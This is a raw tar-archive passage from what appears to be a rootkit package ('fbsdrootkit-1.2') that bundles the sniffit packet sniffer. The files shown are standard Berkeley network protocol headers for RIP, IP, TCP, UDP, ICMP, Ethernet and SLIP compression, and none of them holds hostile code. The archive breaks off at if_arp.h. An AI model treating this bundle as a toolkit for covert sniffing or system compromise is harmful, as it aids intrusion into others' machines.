dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/protocols/routed.h100600 764 764 4363 6226213210 23126 0ustar dfdf/* @(#)routed.h 1.9 88/08/19 SMI; from UCB 5.1 6/4/85 */ /* * Copyright (c) 1983 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ /* * Routing Information Protocol * * Derived from Xerox NS Routing Information Protocol * by changing 32-bit net numbers to sockaddr's and * padding stuff to 32-bit boundaries. */ #ifndef _protocols_routed_h #define _protocols_routed_h #define RIPVERSION 1 struct netinfo { struct sockaddr rip_dst; /* destination net/host */ int rip_metric; /* cost of route */ }; struct rip { u_char rip_cmd; /* request/response */ u_char rip_vers; /* protocol version # */ u_char rip_res1[2]; /* pad to 32-bit boundary */ union { struct netinfo ru_nets[1]; /* variable length... */ char ru_tracefile[1]; /* ditto ... */ } ripun; #define rip_nets ripun.ru_nets #define rip_tracefile ripun.ru_tracefile }; struct entryinfo { struct sockaddr rtu_dst; struct sockaddr rtu_router; short rtu_flags; short rtu_state; int rtu_timer; int rtu_metric; int int_flags; char int_name[16]; }; /* * Packet types. */ #define RIPCMD_REQUEST 1 /* want info - from suppliers */ #define RIPCMD_RESPONSE 2 /* responding to request */ #define RIPCMD_TRACEON 3 /* turn tracing on */ #define RIPCMD_TRACEOFF 4 /* turn it off */ #define RIPCMD_POLL 5 /* like request, but anyone answers */ #define RIPCMD_POLLENTRY 6 /* like poll, but for entire entry */ #define RIPCMD_MAX 7 #ifdef RIPCMDS char *ripcmds[RIPCMD_MAX] = { "#0", "REQUEST", "RESPONSE", "TRACEON", "TRACEOFF", "POLL", "POLLENTRY" }; #endif #define HOPCNT_INFINITY 16 /* per Xerox NS */ #define MAXPACKETSIZE 512 /* max broadcast size */ /* * Timer values used in managing the routing table. * Every update forces an entry's timer to be reset. After * EXPIRE_TIME without updates, the entry is marked invalid, * but held onto until GARBAGE_TIME so that others may * see it "be deleted". */ #define TIMER_RATE 30 /* alarm clocks every 30 seconds */ #define SUPPLY_INTERVAL 30 /* time to supply tables */ #define EXPIRE_TIME 180 /* time to mark entry invalid */ #define GARBAGE_TIME 240 /* time to garbage collect */ #endif /*!_protocols_routed_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/ 40700 764 764 0 6226213210 20770 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/udp_var.h100600 764 764 2015 6226213210 22676 0ustar dfdf/* @(#)udp_var.h 1.8 88/08/19 SMI; from UCB 7.1 6/5/86 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ /* * UDP kernel structures and variables. */ #ifndef _netinet_udp_var_h #define _netinet_udp_var_h struct udpiphdr { struct ipovly ui_i; /* overlaid ip structure */ struct udphdr ui_u; /* udp header */ }; #define ui_next ui_i.ih_next #define ui_prev ui_i.ih_prev #define ui_x1 ui_i.ih_x1 #define ui_pr ui_i.ih_pr #define ui_len ui_i.ih_len #define ui_src ui_i.ih_src #define ui_dst ui_i.ih_dst #define ui_sport ui_u.uh_sport #define ui_dport ui_u.uh_dport #define ui_ulen ui_u.uh_ulen #define ui_sum ui_u.uh_sum struct udpstat { int udps_hdrops; int udps_badsum; int udps_badlen; int udps_fullsock; }; #define UDP_TTL 30 /* time to live for UDP packets */ #ifdef KERNEL struct inpcb udb; struct udpstat udpstat; #endif #endif /*!_netinet_udp_var_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/tcpip.h100600 764 764 1730 6226213210 22360 0ustar dfdf/* @(#)tcpip.h 1.7 88/08/19 SMI; from UCB 7.1 6/5/85 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ /* * Tcp+ip header, after ip options removed. */ #ifndef _netinet_tcpip_h #define _netinet_tcpip_h struct tcpiphdr { struct ipovly ti_i; /* overlaid ip structure */ struct tcphdr ti_t; /* tcp header */ }; #define ti_next ti_i.ih_next #define ti_prev ti_i.ih_prev #define ti_x1 ti_i.ih_x1 #define ti_pr ti_i.ih_pr #define ti_len ti_i.ih_len #define ti_src ti_i.ih_src #define ti_dst ti_i.ih_dst #define ti_sport ti_t.th_sport #define ti_dport ti_t.th_dport #define ti_seq ti_t.th_seq #define ti_ack ti_t.th_ack #define ti_x2 ti_t.th_x2 #define ti_off ti_t.th_off #define ti_flags ti_t.th_flags #define ti_win ti_t.th_win #define ti_sum ti_t.th_sum #define ti_urp ti_t.th_urp #endif /*!_netinet_tcpip_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/in_systm.h100600 764 764 1130 6226213210 23100 0ustar dfdf/* @(#)in_systm.h 1.8 88/08/19 SMI; from UCB 7.1 6/5/86 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ /* * Miscellaneous internetwork * definitions for kernel. */ #ifndef _netinet_in_systm_h #define _netinet_in_systm_h typedef u_short n_short; /* short as received from the net */ typedef u_long n_long; /* long as received from the net */ typedef u_long n_time; /* ms since 00:00 GMT, byte rev */ #endif /*!_netinet_in_systm_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/if_ether.h100600 764 764 3465 6226213210 23035 0ustar dfdf/* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and that due credit is given * to the University of California at Berkeley. The name of the University * may not be used to endorse or promote products derived from this * software without specific prior written permission. This software * is provided ``as is'' without express or implied warranty. * * @(#)if_ether.h 1.28 89/08/04 SMI; from UCB 7.2 12/7/87 */ #ifndef _netinet_if_ether_h #define _netinet_if_ether_h #include /* * Ethernet address - 6 octets */ struct ether_addr { u_char ether_addr_octet[6]; }; /* * Structure of a 10Mb/s Ethernet header. */ struct ether_header { struct ether_addr ether_dhost; struct ether_addr ether_shost; u_short ether_type; }; #define ETHERTYPE_PUP 0x0200 /* PUP protocol */ #define ETHERTYPE_IP 0x0800 /* IP protocol */ #define ETHERTYPE_ARP 0x0806 /* Addr. resolution protocol */ #define ETHERTYPE_REVARP 0x8035 /* Reverse ARP */ #define ETHERTYPE_TRAIL 0x1000 /* * Ethernet Address Resolution Protocol. * * See RFC 826 for protocol description. Structure below is adapted * to resolving internet addresses. Field names used correspond to * RFC 826. */ struct ether_arp { struct arphdr ea_hdr; /* fixed-size header */ struct ether_addr arp_sha; /* sender hardware address */ u_char arp_spa[4]; /* sender protocol address */ struct ether_addr arp_tha; /* target hardware address */ u_char arp_tpa[4]; /* target protocol address */ }; #define arp_hrd ea_hdr.ar_hrd #define arp_pro ea_hdr.ar_pro #define arp_hln ea_hdr.ar_hln #define arp_pln ea_hdr.ar_pln #define arp_op ea_hdr.ar_op #define ETHERMTU 1500 #endif /*!_netinet_if_ether_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/ip.h100600 764 764 7555 6226213210 21664 0ustar dfdf/* @(#)ip.h 1.13 88/08/19 SMI; from UCB 7.6.1.1 3/15/88 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and that due credit is given * to the University of California at Berkeley. The name of the University * may not be used to endorse or promote products derived from this * software without specific prior written permission. This software * is provided ``as is'' without express or implied warranty. */ /* * Definitions for internet protocol version 4. * Per RFC 791, September 1981. */ #ifndef _netinet_ip_h #define _netinet_ip_h #define IPVERSION 4 /* * Structure of an internet header, naked of options. * * We declare ip_len and ip_off to be short, rather than u_short * pragmatically since otherwise unsigned comparisons can result * against negative integers quite easily, and fail in subtle ways. */ struct ip { #if defined(vax) || defined(i386) u_char ip_hl:4, /* header length */ ip_v:4; /* version */ #endif #if defined(mc68000) || defined(sparc) u_char ip_v:4, /* version */ ip_hl:4; /* header length */ #endif u_char ip_tos; /* type of service */ short ip_len; /* total length */ u_short ip_id; /* identification */ short ip_off; /* fragment offset field */ #define IP_DF 0x4000 /* dont fragment flag */ #define IP_MF 0x2000 /* more fragments flag */ u_char ip_ttl; /* time to live */ u_char ip_p; /* protocol */ u_short ip_sum; /* checksum */ struct in_addr ip_src,ip_dst; /* source and dest address */ }; #define IP_MAXPACKET 65535 /* maximum packet size */ /* * Definitions for options. */ #define IPOPT_COPIED(o) ((o)&0x80) #define IPOPT_CLASS(o) ((o)&0x60) #define IPOPT_NUMBER(o) ((o)&0x1f) #define IPOPT_CONTROL 0x00 #define IPOPT_RESERVED1 0x20 #define IPOPT_DEBMEAS 0x40 #define IPOPT_RESERVED2 0x60 #define IPOPT_EOL 0 /* end of option list */ #define IPOPT_NOP 1 /* no operation */ #define IPOPT_RR 7 /* record packet route */ #define IPOPT_TS 68 /* timestamp */ #define IPOPT_SECURITY 130 /* provide s,c,h,tcc */ #define IPOPT_LSRR 131 /* loose source route */ #define IPOPT_SATID 136 /* satnet id */ #define IPOPT_SSRR 137 /* strict source route */ /* * Offsets to fields in options other than EOL and NOP. */ #define IPOPT_OPTVAL 0 /* option ID */ #define IPOPT_OLEN 1 /* option length */ #define IPOPT_OFFSET 2 /* offset within option */ #define IPOPT_MINOFF 4 /* min value of above */ /* * Time stamp option structure. */ struct ip_timestamp { u_char ipt_code; /* IPOPT_TS */ u_char ipt_len; /* size of structure (variable) */ u_char ipt_ptr; /* index of current entry */ #if defined(vax) || defined(i386) u_char ipt_flg:4, /* flags, see below */ ipt_oflw:4; /* overflow counter */ #endif #if defined(mc68000) || defined(sparc) u_char ipt_oflw:4, /* overflow counter */ ipt_flg:4; /* flags, see below */ #endif union ipt_timestamp { n_long ipt_time[1]; struct ipt_ta { struct in_addr ipt_addr; n_long ipt_time; } ipt_ta[1]; } ipt_timestamp; }; /* flag bits for ipt_flg */ #define IPOPT_TS_TSONLY 0 /* timestamps only */ #define IPOPT_TS_TSANDADDR 1 /* timestamps and addresses */ #define IPOPT_TS_PRESPEC 2 /* specified modules only */ /* bits for security (not byte swapped) */ #define IPOPT_SECUR_UNCLASS 0x0000 #define IPOPT_SECUR_CONFID 0xf135 #define IPOPT_SECUR_EFTO 0x789a #define IPOPT_SECUR_MMMM 0xbc4d #define IPOPT_SECUR_RESTR 0xaf13 #define IPOPT_SECUR_SECRET 0xd788 #define IPOPT_SECUR_TOPSECRET 0x6bc5 /* * Internet implementation parameters. */ #define MAXTTL 255 /* maximum time to live (seconds) */ #define IPFRAGTTL 60 /* time to live for frags, slowhz */ #define IPTTLDEC 1 /* subtracted when forwarding */ #define IP_MSS 576 /* default maximum segment size */ #endif /*!_netinet_ip_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/ip_icmp.h100600 764 764 10003 6226213210 22672 0ustar dfdf/* @(#)ip_icmp.h 1.9 88/08/19 SMI; from UCB 7.3 12/7/87 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that this notice is preserved and that due credit is given * to the University of California at Berkeley. The name of the University * may not be used to endorse or promote products derived from this * software without specific prior written permission. This software * is provided ``as is'' without express or implied warranty. */ /* * Interface Control Message Protocol Definitions. * Per RFC 792, September 1981. */ #ifndef _netinet_ip_icmp_h #define _netinet_ip_icmp_h /* * Structure of an icmp header. */ struct icmp { u_char icmp_type; /* type of message, see below */ u_char icmp_code; /* type sub code */ u_short icmp_cksum; /* ones complement cksum of struct */ union { u_char ih_pptr; /* ICMP_PARAMPROB */ struct in_addr ih_gwaddr; /* ICMP_REDIRECT */ struct ih_idseq { n_short icd_id; n_short icd_seq; } ih_idseq; int ih_void; } icmp_hun; #define icmp_pptr icmp_hun.ih_pptr #define icmp_gwaddr icmp_hun.ih_gwaddr #define icmp_id icmp_hun.ih_idseq.icd_id #define icmp_seq icmp_hun.ih_idseq.icd_seq #define icmp_void icmp_hun.ih_void union { struct id_ts { n_time its_otime; n_time its_rtime; n_time its_ttime; } id_ts; struct id_ip { struct ip idi_ip; /* options and then 64 bits of data */ } id_ip; u_long id_mask; char id_data[1]; } icmp_dun; #define icmp_otime icmp_dun.id_ts.its_otime #define icmp_rtime icmp_dun.id_ts.its_rtime #define icmp_ttime icmp_dun.id_ts.its_ttime #define icmp_ip icmp_dun.id_ip.idi_ip #define icmp_mask icmp_dun.id_mask #define icmp_data icmp_dun.id_data }; /* * Lower bounds on packet lengths for various types. * For the error advice packets must first insure that the * packet is large enought to contain the returned ip header. * Only then can we do the check to see if 64 bits of packet * data have been returned, since we need to check the returned * ip header length. */ #define ICMP_MINLEN 8 /* abs minimum */ #define ICMP_TSLEN (8 + 3 * sizeof (n_time)) /* timestamp */ #define ICMP_MASKLEN 12 /* address mask */ #define ICMP_ADVLENMIN (8 + sizeof (struct ip) + 8) /* min */ #define ICMP_ADVLEN(p) (8 + ((p)->icmp_ip.ip_hl << 2) + 8) /* N.B.: must separately check that ip_hl >= 5 */ /* * Definition of type and code field values. */ #define ICMP_ECHOREPLY 0 /* echo reply */ #define ICMP_UNREACH 3 /* dest unreachable, codes: */ #define ICMP_UNREACH_NET 0 /* bad net */ #define ICMP_UNREACH_HOST 1 /* bad host */ #define ICMP_UNREACH_PROTOCOL 2 /* bad protocol */ #define ICMP_UNREACH_PORT 3 /* bad port */ #define ICMP_UNREACH_NEEDFRAG 4 /* IP_DF caused drop */ #define ICMP_UNREACH_SRCFAIL 5 /* src route failed */ #define ICMP_SOURCEQUENCH 4 /* packet lost, slow down */ #define ICMP_REDIRECT 5 /* shorter route, codes: */ #define ICMP_REDIRECT_NET 0 /* for network */ #define ICMP_REDIRECT_HOST 1 /* for host */ #define ICMP_REDIRECT_TOSNET 2 /* for tos and net */ #define ICMP_REDIRECT_TOSHOST 3 /* for tos and host */ #define ICMP_ECHO 8 /* echo service */ #define ICMP_TIMXCEED 11 /* time exceeded, code: */ #define ICMP_TIMXCEED_INTRANS 0 /* ttl==0 in transit */ #define ICMP_TIMXCEED_REASS 1 /* ttl==0 in reass */ #define ICMP_PARAMPROB 12 /* ip header bad */ #define ICMP_TSTAMP 13 /* timestamp request */ #define ICMP_TSTAMPREPLY 14 /* timestamp reply */ #define ICMP_IREQ 15 /* information request */ #define ICMP_IREQREPLY 16 /* information reply */ #define ICMP_MASKREQ 17 /* address mask request */ #define ICMP_MASKREPLY 18 /* address mask reply */ #define ICMP_MAXTYPE 18 #define ICMP_INFOTYPE(type) \ ((type) == ICMP_ECHOREPLY || (type) == ICMP_ECHO || \ (type) == ICMP_TSTAMP || (type) == ICMP_TSTAMPREPLY || \ (type) == ICMP_IREQ || (type) == ICMP_IREQREPLY || \ (type) == ICMP_MASKREQ || (type) == ICMP_MASKREPLY) #endif /*!_netinet_ip_icmp_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/ip_var.h100600 764 764 6121 6226213210 22520 0ustar dfdf/* @(#)ip_var.h 1.11 88/08/19 SMI; from UCB 7.1 6/5/86 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ /* * Overlay for ip header used by other protocols (tcp, udp). */ #ifndef _netinet_ip_var_h #define _netinet_ip_var_h struct ipovly { caddr_t ih_next, ih_prev; /* for protocol sequence q's */ u_char ih_x1; /* (unused) */ u_char ih_pr; /* protocol */ short ih_len; /* protocol length */ struct in_addr ih_src; /* source internet address */ struct in_addr ih_dst; /* destination internet address */ }; /* * Ip reassembly queue structure. Each fragment * being reassembled is attached to one of these structures. * They are timed out after ipq_ttl drops to 0, and may also * be reclaimed if memory becomes tight. */ struct ipq { struct ipq *next,*prev; /* to other reass headers */ u_char ipq_ttl; /* time for reass q to live */ u_char ipq_p; /* protocol of this fragment */ u_short ipq_id; /* sequence id for reassembly */ struct ipasfrag *ipq_next,*ipq_prev; /* to ip headers of fragments */ struct in_addr ipq_src,ipq_dst; }; /* * Ip header, when holding a fragment. * * Note: ipf_next must be at same offset as ipq_next above */ struct ipasfrag { #if defined(vax) || defined(i386) u_char ip_hl:4, ip_v:4; #endif #if defined(mc68000) || defined(sparc) u_char ip_v:4, ip_hl:4; #endif u_char ipf_mff; /* copied from (ip_off&IP_MF) */ short ip_len; u_short ip_id; short ip_off; u_char ip_ttl; u_char ip_p; u_short ip_sum; struct ipasfrag *ipf_next; /* next fragment */ struct ipasfrag *ipf_prev; /* previous fragment */ }; /* * Structure stored in mbuf in inpcb.ip_options * and passed to ip_output when ip options are in use. * The actual length of the options (including ipopt_dst) * is in m_len. */ #define MAX_IPOPTLEN 40 struct ipoption { struct in_addr ipopt_dst; /* first-hop dst if source routed */ char ipopt_list[MAX_IPOPTLEN]; /* options proper */ }; struct ipstat { long ips_total; /* total packets received */ long ips_badsum; /* checksum bad */ long ips_tooshort; /* packet too short */ long ips_toosmall; /* not enough data */ long ips_badhlen; /* ip header length < data size */ long ips_badlen; /* ip length < ip header length */ long ips_fragments; /* fragments received */ long ips_fragdropped; /* frags dropped (dups, out of space) */ long ips_fragtimeout; /* fragments timed out */ long ips_forward; /* packets forwarded */ long ips_cantforward; /* packets rcvd for unreachable dest */ long ips_redirectsent; /* packets forwarded on same net */ }; #ifdef KERNEL /* flags passed to ip_output as last parameter */ #define IP_FORWARDING 0x1 /* most of ip header exists */ #define IP_ROUTETOIF SO_DONTROUTE /* bypass routing tables */ #define IP_ALLOWBROADCAST SO_BROADCAST /* can send broadcast packets */ struct ipstat ipstat; struct ipq ipq; /* ip reass. queue */ u_short ip_id; /* ip packet ctr, for ids */ struct mbuf *ip_srcroute(); #endif #endif /*!_netinet_ip_var_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/tcp.h100600 764 764 2520 6226213210 22025 0ustar dfdf/* @(#)tcp.h 1.11 88/08/19 SMI; from UCB 7.2 10/28/86 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ #ifndef _netinet_tcp_h #define _netinet_tcp_h typedef u_long tcp_seq; /* * TCP header. * Per RFC 793, September, 1981. */ struct tcphdr { u_short th_sport; /* source port */ u_short th_dport; /* destination port */ tcp_seq th_seq; /* sequence number */ tcp_seq th_ack; /* acknowledgement number */ #if defined(vax) || defined(i386) u_char th_x2:4, /* (unused) */ th_off:4; /* data offset */ #endif #if defined(mc68000) || defined(sparc) u_char th_off:4, /* data offset */ th_x2:4; /* (unused) */ #endif u_char th_flags; #define TH_FIN 0x01 #define TH_SYN 0x02 #define TH_RST 0x04 #define TH_PUSH 0x08 #define TH_ACK 0x10 #define TH_URG 0x20 u_short th_win; /* window */ u_short th_sum; /* checksum */ u_short th_urp; /* urgent pointer */ }; #define TCPOPT_EOL 0 #define TCPOPT_NOP 1 #define TCPOPT_MAXSEG 2 /* * Default maximum segment size for TCP. * With an IP MSS of 576, this is 536, * but 512 is probably more convenient. */ #ifdef lint #define TCP_MSS 536 #else #define TCP_MSS MIN(512, IP_MSS - sizeof (struct tcpiphdr)) #endif #endif /*!_netinet_tcp_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/tcp_var.h100600 764 764 14273 6226213210 22725 0ustar dfdf/* @(#)tcp_var.h 1.11 88/08/19 SMI; from UCB 7.3 6/30/87 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ /* * Kernel variables for tcp. */ #ifndef _netinet_tcp_var_h #define _netinet_tcp_var_h /* * Tcp control block, one per tcp; fields: */ struct tcpcb { struct tcpiphdr *seg_next; /* sequencing queue */ struct tcpiphdr *seg_prev; short t_state; /* state of this connection */ short t_timer[TCPT_NTIMERS]; /* tcp timers */ short t_rxtshift; /* log(2) of rexmt exp. backoff */ short t_rxtcur; /* current retransmit value */ short t_dupacks; /* consecutive dup acks recd */ u_short t_maxseg; /* maximum segment size */ char t_force; /* 1 if forcing out a byte */ u_char t_flags; #define TF_ACKNOW 0x01 /* ack peer immediately */ #define TF_DELACK 0x02 /* ack, but try to delay it */ #define TF_NODELAY 0x04 /* don't delay packets to coalesce */ #define TF_NOOPT 0x08 /* don't use tcp options */ #define TF_SENTFIN 0x10 /* have sent FIN */ struct tcpiphdr *t_template; /* skeletal packet for transmit */ struct inpcb *t_inpcb; /* back pointer to internet pcb */ /* * The following fields are used as in the protocol specification. * See RFC783, Dec. 1981, page 21. */ /* send sequence variables */ tcp_seq snd_una; /* send unacknowledged */ tcp_seq snd_nxt; /* send next */ tcp_seq snd_up; /* send urgent pointer */ tcp_seq snd_wl1; /* window update seg seq number */ tcp_seq snd_wl2; /* window update seg ack number */ tcp_seq iss; /* initial send sequence number */ u_short snd_wnd; /* send window */ /* receive sequence variables */ u_short rcv_wnd; /* receive window */ tcp_seq rcv_nxt; /* receive next */ tcp_seq rcv_up; /* receive urgent pointer */ tcp_seq irs; /* initial receive sequence number */ /* * Additional variables for this implementation. */ /* receive variables */ tcp_seq rcv_adv; /* advertised window */ /* retransmit variables */ tcp_seq snd_max; /* highest sequence number sent * used to recognize retransmits */ /* congestion control (for slow start, source quench, retransmit after loss) */ u_short snd_cwnd; /* congestion-controlled window */ u_short snd_ssthresh; /* snd_cwnd size threshhold for * for slow start exponential to * linear switch */ /* * transmit timing stuff. * srtt and rttvar are stored as fixed point; for convenience in smoothing, * srtt has 3 bits to the right of the binary point, rttvar has 2. * "Variance" is actually smoothed difference. */ short t_idle; /* inactivity time */ short t_rtt; /* round trip time */ tcp_seq t_rtseq; /* sequence number being timed */ short t_srtt; /* smoothed round-trip time */ short t_rttvar; /* variance in round-trip time */ u_short max_rcvd; /* most peer has sent into window */ u_short max_sndwnd; /* largest window peer has offered */ /* out-of-band data */ char t_oobflags; /* have some */ char t_iobc; /* input character */ #define TCPOOB_HAVEDATA 0x01 #define TCPOOB_HADDATA 0x02 }; #define intotcpcb(ip) ((struct tcpcb *)(ip)->inp_ppcb) #define sototcpcb(so) (intotcpcb(sotoinpcb(so))) /* * TCP statistics. * Many of these should be kept per connection, * but that's inconvenient at the moment. */ struct tcpstat { u_long tcps_connattempt; /* connections initiated */ u_long tcps_accepts; /* connections accepted */ u_long tcps_connects; /* connections established */ u_long tcps_drops; /* connections dropped */ u_long tcps_conndrops; /* embryonic connections dropped */ u_long tcps_closed; /* conn. closed (includes drops) */ u_long tcps_segstimed; /* segs where we tried to get rtt */ u_long tcps_rttupdated; /* times we succeeded */ u_long tcps_delack; /* delayed acks sent */ u_long tcps_timeoutdrop; /* conn. dropped in rxmt timeout */ u_long tcps_rexmttimeo; /* retransmit timeouts */ u_long tcps_persisttimeo; /* persist timeouts */ u_long tcps_keeptimeo; /* keepalive timeouts */ u_long tcps_keepprobe; /* keepalive probes sent */ u_long tcps_keepdrops; /* connections dropped in keepalive */ u_long tcps_sndtotal; /* total packets sent */ u_long tcps_sndpack; /* data packets sent */ u_long tcps_sndbyte; /* data bytes sent */ u_long tcps_sndrexmitpack; /* data packets retransmitted */ u_long tcps_sndrexmitbyte; /* data bytes retransmitted */ u_long tcps_sndacks; /* ack-only packets sent */ u_long tcps_sndprobe; /* window probes sent */ u_long tcps_sndurg; /* packets sent with URG only */ u_long tcps_sndwinup; /* window update-only packets sent */ u_long tcps_sndctrl; /* control (SYN|FIN|RST) packets sent */ u_long tcps_rcvtotal; /* total packets received */ u_long tcps_rcvpack; /* packets received in sequence */ u_long tcps_rcvbyte; /* bytes received in sequence */ u_long tcps_rcvbadsum; /* packets received with ccksum errs */ u_long tcps_rcvbadoff; /* packets received with bad offset */ u_long tcps_rcvshort; /* packets received too short */ u_long tcps_rcvduppack; /* duplicate-only packets received */ u_long tcps_rcvdupbyte; /* duplicate-only bytes received */ u_long tcps_rcvpartduppack; /* packets with some duplicate data */ u_long tcps_rcvpartdupbyte; /* dup. bytes in part-dup. packets */ u_long tcps_rcvoopack; /* out-of-order packets received */ u_long tcps_rcvoobyte; /* out-of-order bytes received */ u_long tcps_rcvpackafterwin; /* packets with data after window */ u_long tcps_rcvbyteafterwin; /* bytes rcvd after window */ u_long tcps_rcvafterclose; /* packets rcvd after "close" */ u_long tcps_rcvwinprobe; /* rcvd window probe packets */ u_long tcps_rcvdupack; /* rcvd duplicate acks */ u_long tcps_rcvacktoomuch; /* rcvd acks for unsent data */ u_long tcps_rcvackpack; /* rcvd ack packets */ u_long tcps_rcvackbyte; /* bytes acked by rcvd acks */ u_long tcps_rcvwinupd; /* rcvd window update packets */ }; #ifdef KERNEL struct inpcb tcb; /* head of queue of active tcpcb's */ struct tcpstat tcpstat; /* tcp statistics */ struct tcpiphdr *tcp_template(); struct tcpcb *tcp_close(), *tcp_drop(); struct tcpcb *tcp_timers(), *tcp_disconnect(), *tcp_usrclosed(); #endif #ifdef sun #define TCP_COMPAT_42 #endif #endif /*!_netinet_tcp_var_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/netinet/udp.h100600 764 764 1067 6226213210 22034 0ustar dfdf/* @(#)udp.h 1.7 88/08/19 SMI; from UCB 7.1 6/5/86 */ /* * Copyright (c) 1982, 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ /* * Udp protocol header. * Per RFC 768, September, 1981. */ #ifndef _netinet_udp_h #define _netinet_udp_h struct udphdr { u_short uh_sport; /* source port */ u_short uh_dport; /* destination port */ short uh_ulen; /* udp length */ u_short uh_sum; /* udp checksum */ }; #endif /*!_netinet_udp_h*/ fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/net/ 40700 764 764 0 6226213210 20110 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/net/slip.h100600 764 764 261 6226213210 21306 0ustar dfdf/* linux does not give us the link level header */ #define SLIP_HDRLEN 16 #define SLX_DIR 0 #define SLX_CHDR 1 #define CHDR_LEN 15 #define SLIPDIR_IN 0 #define SLIPDIR_OUT 1 fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/net/slcompress.h100600 764 764 7364 6226213210 22564 0ustar dfdf/* * Definitions for tcp compression routines. * * @(#) $Header: slcompress.h,v 1.15 93/09/04 22:15:29 leres Exp $ (LBL) * * Copyright (c) 1989, 1990, 1992, 1993 Regents of the University of * California. All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that the above copyright notice and this paragraph are * duplicated in all such forms and that any documentation, * advertising materials, and other materials related to such * distribution and use acknowledge that the software was developed * by the University of California, Berkeley. The name of the * University may not be used to endorse or promote products derived * from this software without specific prior written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. * * Van Jacobson (van@ee.lbl.gov), Dec 31, 1989: * - Initial distribution. */ #define MAX_STATES 16 /* must be > 2 and < 256 */ #define MAX_HDR MLEN /* XXX 4bsd-ism: should really be 128 */ /* * Compressed packet format: * * The first octet contains the packet type (top 3 bits), TCP * 'push' bit, and flags that indicate which of the 4 TCP sequence * numbers have changed (bottom 5 bits). The next octet is a * conversation number that associates a saved IP/TCP header with * the compressed packet. The next two octets are the TCP checksum * from the original datagram. The next 0 to 15 octets are * sequence number changes, one change per bit set in the header * (there may be no changes and there are two special cases where * the receiver implicitly knows what changed -- see below). * * There are 5 numbers which can change (they are always inserted * in the following order): TCP urgent pointer, window, * acknowlegement, sequence number and IP ID. (The urgent pointer * is different from the others in that its value is sent, not the * change in value.) Since typical use of SLIP links is biased * toward small packets (see comments on MTU/MSS below), changes * use a variable length coding with one octet for numbers in the * range 1 - 255 and 3 octets (0, MSB, LSB) for numbers in the * range 256 - 65535 or 0. (If the change in sequence number or * ack is more than 65535, an uncompressed packet is sent.) */ /* * Packet types (must not conflict with IP protocol version) * * The top nibble of the first octet is the packet type. There are * three possible types: IP (not proto TCP or tcp with one of the * control flags set); uncompressed TCP (a normal IP/TCP packet but * with the 8-bit protocol field replaced by an 8-bit connection id -- * this type of packet syncs the sender & receiver); and compressed * TCP (described above). * * LSB of 4-bit field is TCP "PUSH" bit (a worthless anachronism) and * is logically part of the 4-bit "changes" field that follows. Top * three bits are actual packet type. For backward compatibility * and in the interest of conserving bits, numbers are chosen so the * IP protocol version number (4) which normally appears in this nibble * means "IP packet". */ /* packet types */ #define TYPE_IP 0x40 #define TYPE_UNCOMPRESSED_TCP 0x70 #define TYPE_COMPRESSED_TCP 0x80 #define TYPE_ERROR 0x00 /* Bits in first octet of compressed packet */ #define NEW_C 0x40 /* flag bits for what changed in a packet */ #define NEW_I 0x20 #define NEW_S 0x08 #define NEW_A 0x04 #define NEW_W 0x02 #define NEW_U 0x01 /* reserved, special-case values of above */ #define SPECIAL_I (NEW_S|NEW_W|NEW_U) /* echoed interactive traffic */ #define SPECIAL_D (NEW_S|NEW_A|NEW_W|NEW_U) /* unidirectional data */ #define SPECIALS_MASK (NEW_S|NEW_A|NEW_W|NEW_U) #define TCP_PUSH_BIT 0x10 fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/sys/ 40700 764 764 0 6226213210 20140 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/sys/mbuf.h100600 764 764 0 6226213210 21247 0ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/linux/ 40700 764 764 0 6226213210 20461 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/linux/if_arp.h100600 764 764 3217 6226213210 22174 0ustar 